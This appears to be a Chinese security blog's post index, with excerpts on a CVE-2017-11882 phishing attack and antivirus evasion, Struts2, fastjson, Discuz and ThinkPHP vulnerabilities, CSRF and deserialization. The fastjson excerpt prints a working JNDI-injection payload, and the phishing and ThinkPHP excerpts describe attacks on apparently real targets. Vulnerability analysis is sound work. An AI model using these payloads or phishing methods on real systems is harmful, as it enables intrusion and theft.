CVE-2017-11882钓鱼攻击

CVE-2017-11882钓鱼攻击
本文概述一次钓鱼攻击 0x00 前言 0x01 环境简介 0x02 配置环境 0x03 生成钓鱼RTF文档 0x04 利用结果 0x05 关于免杀 - mshta.exe 0x00 前言 此次攻击使用了小组师傅改写的CVE利用脚本,能够将内容自定义,大大增加了小鱼上钩的可能。 0x01 环境简介 阿里云ECS服务器(Ubuntu) - 118.**.**.77 CVE-2017-11882.py 用于包装rtf msf && CVE-2017-11882.rb CVE-2017-11882.rb内容如下: ## # Thi...

Apache Struts2 S2-057漏洞分析与复现

Apache Struts2 S2-057漏洞分析与复现
目前已知问题strusts低版本能弹计算器,高版本不能,经测试struts-2.2.3.1-all.zip(http://archive.apache.org/dist/struts/binaries/struts-2.2.3.1-all.zip)可弹计算器  0x00 漏洞描述 It is possible to perform a RCE attack when namespace value isn’t set for a result defined in underlying xml configurations and in same time, its upper action(s) configurations have no or wildcard name...

跨域方法总结

跨域方法总结
跨域方法总结 最近面试问的挺多的一个问题,就是JavaScript的跨域问题。在这里,对跨域的一些方法做个总结。由于浏览器的同源策略,不同域名、不同端口、不同协议都会构成跨域;但在实际的业务中,很多场景需要进行跨域传递信息,这样就催生出多种跨域方法。 1. 具备src的标签 原理:所有具有src属性的HTML标签都是可以跨域的 在浏览器中,<script>、<img>、<iframe>和<link>...

读取型CSRF-需要交互的内容劫持

读取型CSRF-需要交互的内容劫持
前言 最近在挖洞,”实践出真知”这句话说的很对,在实际挖掘过程中我会思考很多东西,跟朋友一起准备做一份手册,忽然的想到了一些漏洞的定义和规范。 在大多数的人眼里CSRF可能仅仅是写入型的比如:修改个人资料、授权登陆等等功能场景的CSRF问题,同时对CSRF这类问题进行了危害等级划分,就像如上两个例子,可以划分为中危和高危。也许是因为交互式的漏洞并没有SQLi这种直接能利用的漏洞危害高,所以一些...

记一次Java反序列化漏洞的发现和修复

记一次Java反序列化漏洞的发现和修复
作者:[email protected]勾陈安全 0x00 背景简介 本文是自己对一次反序列化漏洞的发现和修复过程,如有错误请斧正,大神请轻喷。 目标应用系统是典型的CS模式。 客户端是需要安装的windows桌面程序,但是它是大部分内容都是基于Java开发(安装目录有很多Jar包)。 服务端是基于Jboss开发。 客户端和服务端之间的通信流量是序列化了的数据流量。客户端接收和解析数据流量的模式和服务端一样,也是通过http服务,它在本地...

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...

密码保护:FastJson 反序列化学习

密码保护:FastJson 反序列化学习
0x01 概述 主要是本次某*行动,据传闻有个fastjson的0day,我就很好奇,刚好自己之前没有学习过这个东西,所以蹭着这个时间把这个学习一下。 0x02 分析过程 什么是fastjson Fastjson是一个由阿里巴巴维护的一个json库。它采用一种“假定有序快速匹配”的算法,是号称Java中最快的json库。最早的通告在这里。而fastjson的用法可以先看看下面这个例子。 先定义一个User类 package com.l1nk3r.fastjson; publ...

漏洞分析 | Discuz ML! V3.X 代码注入漏洞

漏洞分析 | Discuz ML! V3.X 代码注入漏洞
Discuz!ML V3.X 代码注入分析 代码来源:http://discuz.ml/download 作者:Web安全组-CoolCat 漏洞定位 在PoC的代码中填充'.1.'使得代码出错,定位出错代码文件: 代码报错 根据报错跟踪到source/module/portal/portal_index.php第32行 portal_index.php 代码 查看问题函数上方查看定义函数以及关联文件的位置,可以看到template函数在/source/function/function_core.php中,继续跟进。 函数从 524行一...

thinkPHP渗透之经验决定成败

thinkPHP渗透之经验决定成败
如上图,目标就一个登陆框,最近 Thinkphp 程序很多,根据后台地址结构,猜测可能是 ThinkPHP ,随手输入 xxx 得到 thinkPHP 报错页面,确定目标程序和版本。 然后上 5.X EXP 测试: 命令执行漏洞已经被修复了。。。 爆破?这验证码我没辙。。。 尝试读取日志瞅瞅,结果遇到防火墙 然后查了下 IP ,没有CDN,果断查下旁站,有那么几个站,目测都是 thinkPHP 爱站旁站查询其实并不准确,有的查不到,所以...